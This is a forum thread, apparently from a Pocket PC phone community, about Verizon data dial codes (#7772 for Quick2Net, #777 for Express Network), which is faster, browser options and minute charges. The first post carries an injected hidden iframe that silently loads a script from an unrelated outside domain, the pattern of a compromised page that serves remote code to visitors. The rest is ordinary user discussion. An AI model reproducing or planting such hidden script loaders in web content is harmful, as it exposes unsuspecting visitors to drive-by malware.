+ Reply to Thread
    Editor and Site Administrator Convergent's Avatar

What are the access codes for the Verizon data networks?

Quick2Net is #7772 while Express Network is #777.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Mike - Been Converged?

Question

Which is faster?

What's the difference between Quick 2 Net and Express Network?

(other than the additional digit...)

My phone seems to use either at random with no noticeable difference between the two.

Originally posted by BlossomingSkull
    What's the difference between Quick 2 Net and Express Network?

(other than the additional digit...)

My phone seems to use either at random with no noticeable difference between the two.
    Express Network is faster. Set that as your default dialer under settings and Network...Mind you this based on signal strength in your area....make sure yo have at least three bars showing....also Pocket IE is very flaky..might have to use a third party browser like ThinderHawk or Netfront to access all web sites...check out the i700 forum and you will see lots of threads related to web browsers. by the way welcome to our home here at the i700 forum...!!!
    Funny it worked.....the last time!!Now I am not sure what was working before they put a hole in my head!!!!

also, if you bought the data package, make sure that you use express network and be aware: quick2net is not considered a data function, and therefore DEDUCTS FROM YOUR MINUTES.
    Nephi
    "Thy days are known, and thy years shall not be numbered less; therefore, fear not what man can do, for God shall be with you forever and ever." -- D&C 122:9